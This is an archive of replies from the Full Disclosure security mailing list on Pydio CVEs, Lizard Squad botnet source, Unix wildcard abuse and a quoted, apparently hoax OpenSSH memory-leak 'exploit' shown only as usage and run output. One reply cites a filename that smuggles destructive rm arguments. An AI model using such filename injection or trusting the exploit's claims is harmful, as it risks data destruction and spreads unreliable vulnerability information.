Re: [FD] pydio vulnerabilities
https://github.com/pydio/pydio-core/commits/develop https://github.com/pydio/pydio-core/commit/2049254e7a215491019d2646a274a8fb1cf29e3b 2015-05-07 1:32 GMT+03:00 Just A Fake robottomonitorbugt...@gmail.com: Does anyone have any info on the two pydio vulnerabilities announced today? They have been given CVE-2015-3431 and CVE-2015-3432 but a search on mitre just says those are reserved. There is no information or explanation about what the issues are. https://pyd.io/pydio-core-6-0-7/?utm_source=Pydio+Releasesutm_campaign=85ba0d8870-Pydio_6_0_7_Community Thanks for any info anyone has. Robot ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/ ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
Re: [FD] Facebook Bug Bounty #23 - Session ID CSRF Vulnerability
Even though deleting everything is kind of a big deal, it still does not get you anywhere near that CVSS score. Here's my very generous calculator inputs: http://puu.sh/fQVB5/76c526ed5d.png ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
Re: [FD] Lizard Stresser rekt
ayy lmao //Julius Kivimäki, leader of Lizard Squad 2015-01-12 10:29 GMT+00:00 Robert Cavanaugh sleuth1...@gmail.com: Hi FD, I'm sure you're all sick to death of hearing about Lizard Squad and the skid marks they're leaving all over the place, so we'll make this brief: Lizard Squad has been rekt and the source code for their bots is now available for your viewing pleasure. https://github.com/pop-pop-ret/lizkebab 0wned by: Chippy1337, @packetprophet If you lulz'd, send BTC to 129UQoB3JvZg3iDERYZiXeHPkwT1iJF8u4 https://blockchain.info/address/129UQoB3JvZg3iDERYZiXeHPkwT1iJF8u4 ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/ ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
Re: [FD] Back To The Future: Unix Wildcards Gone Wild
Um, this is well documented behavior that's been around for decades. * expands to all files in the dir as arguments to whatever, if the filename is --no-preserve-root -rf .. why shouldn't that be returned? 2014-06-26 11:40 GMT+03:00 defensecode defensec...@defensecode.com: Hi, We wanted to inform all major *nix distributions via our responsible disclosure policy about this problem before posting it, because it is highly likely that this problem could lead to local root access on many distributions. But, since part of this research contained in the document was mentioned on some blog entries, we are forced to release it in a full version. Download URL: http://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt Regards, Leon Juranic ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/ ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
Re: [FD] What do you think of Trollc?
If you actually know weev then you know that he isn't capable of running a business. 2014-05-27 21:49 GMT+03:00 Philip Cheong isc...@gmail.com: From https://www.startjoin.com/trollc *Right now if you're a software exploit developer and you want to monetize your craft to pay your rent, there's only one consistent way to do so: sell your software exploits. The major customer for these are oppressive governments, chiefly that of the United States. We know what the United States does with software exploits: it uses them to illegally spy on its own citizens, and attack peaceful nations around the world.* *I need your help to create a company that will ethically disclose software vulnerabilities to the public. For this I need help getting the filing fees necessary to incorporate a hedge fund. I want to continue bringing issues in companies that put you at risk to light, and short the stocks of those companies when I do so. I will only get paid when large corporations being negligent get punished. This will create a structure by which security researchers including myself will still make a living, only now by disclosing problems instead of selling them in secret to criminal governments.* What say you? Is this brilliant? Or stupid? Awesome? But never going to work? ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/ ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
Re: [FD] OpenSSH Vulnerabilities
PAM, how does it work? 2014-05-07 1:08 GMT+03:00 de...@roosoft.ltd.uk: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 http://pastebin.com/raw.?i=gjkivAf3 - -- CUT -- #exploit #openssh ░░▓▓ ░░░ ▓▓▓ ░ ▓ ░▓ ░░░▓▓▓ ░░ ▓▓ ░▓ ░█▒▓ ██░ ▓▒▒ █ ▒ ░▓▓▓█░░▓▓▒░░░▓ █░░░ ▓▓▓▒ ░▓█░░ ▓▓▒▓▓ ░░░▓▓▓█░░ ▓▓▒░▓ ▓▓▓░░░ ▓▓▓░░ ░░░▓ ▓▓▓╔╕░▓▓ ░║OpenSSH sshd - memory leak │▓ ░░║ 5.1-6.X │▓▓ ░░░║ (priv8, still unfixed) │▓▓▓ ░░░╙┘▓▓▓ u mad Heartbleed ? ... Release date: 04/30/2014 Product: OpenSSH Vendor: http://www.openssh.com/ CVE candidate number: CVE-2018- (maybe 2020+...) We found two years ago a memory disclosure vulnerability in the OpenSSH server which allows to remotely extract data from the sshd server's children processes memory zones. This vulnerability exploits a bad check on the network layer of the sshd server that we trigger to retrieve all children processes memory sections thereby allowing us to dump: - - system users hashes - - keys - - many random things ;) This exploit was tested on: - - SSH-2.0-OpenSSH_5.1p1 Debian-5 - - SSH-2.0-OpenSSH_5.1p1 DragonFly-20080927 - - SSH-2.0-OpenSSH_5.2p1 FreeBSD-20090522 - - SSH-2.0-OpenSSH_5.5p1 Debian-6+squeeze3 - - SSH-2.0-OpenSSH_5.8p1 Debian-7ubuntu1 - - SSH-2.0-OpenSSH_6.1p1 Debian-4 - - SSH-2.0-OpenSSH_6.2p2-hpn13v14 FreeBSD-openssh-portable-6.2.p2_3,1 - - SSH-2.0-OpenSSH_6.4p1 Debian-1~bpo70+1 - - SSH-2.0-OpenSSH_6.4p1 FreeBSD-openssh-portable-6.4.p1,1 - - SSH-2.0-OpenSSH_6.5p1 CentOS RHEL - - SSH-2.0-OpenSSH_6.6p1 Ubuntu-2ubuntu1 - - ... many more Enough bullshit, POC TIME ! = $ ls -lh total 227K drwxr-xr-x 2 vjn vjn 4.0K Apr 30 01:53 . drwxrwxrwt 32 root root 4.0K Apr 30 01:53 .. - -rw-r--r-- 1 vjn vjn 236K Apr 30 01:53 icanhaze.c $ sha1sum icanhaze.c d7faeb46f10ea6b7058a116043c1f0ce7a158c7f icanhaze.c $ gcc icanhaze.c -O3 -lcrypto -lopenbsd-compat -lssl -lssh -lpam -o icanhaze $ ./icanhaze +--+ | OpenSSH 5.1-6.X - infoleak | | don't evar fuckin release it | +--+ Usage: ./icanhaze [OPTIONS] -h, --host host Hostname or IP -p, --port port Port number (default: 22) -d, --dump dump_file Dump output file -H, --hashes hashes_file User hashes dump file (john) -v, --verbose Verbose mode -D, --debug Debug mode Supported architectures: x86, x86_64, armv7 Supported operating systems: Linux, *BSD $ ./icanhaze -v -h 192.168.10.5 -p 22 -d output.dump -H +--+ | OpenSSH 5.1-6.X - infoleak | | don't evar fuckin release it | +--+ [I] - connecting to target 192.168.10.5 on port 22 [I] - sshd banner: SSH-2.0-OpenSSH_6.4p1 Debian-1~bpo70+1 [I] - let magic happenz [W] - bad luck... retrying [W] - bad luck... retrying [W] - bad luck... retrying [W] - bad luck... retrying [W] - bad luck... retrying [W] - bad luck... retrying [I] - STAGE_1: OK [I] - mode: x86_64 [I] - pointerz fuckery [I] - STAGE_2: OK [I] - fingerprinted child sectionz table 7f863100f000-7f863101 7f8631213000-7f8631214000 7f8631418000-7f8631419000 7f863161b000-7f863161c000 7f863181e000-7f863181f000 7f8631a22000-7f8631a23000 7f8631c68000-7f8631c69000 7f8631e6b000-7f8631e6c000 7f863206d000-7f863206e000 7f8632272000-7f8632273000 7f8632475000-7f8632476000 7f863267a000-7f863267b000 7f863287e000-7f863287f000 7f8632a8-7f8632a81000 7f8632c82000-7f8632c83000 7f8632e84000-7f8632e85000 7f8633092000-7f8633093000 7f8633093000-7f863309f000 7f86332a4000-7f86332a5000 7f86334b-7f86334b1000 7f86336bb000-7f86336bc000 7f86338c3000-7f86338c4000 7f8633ad7000-7f8633ad8000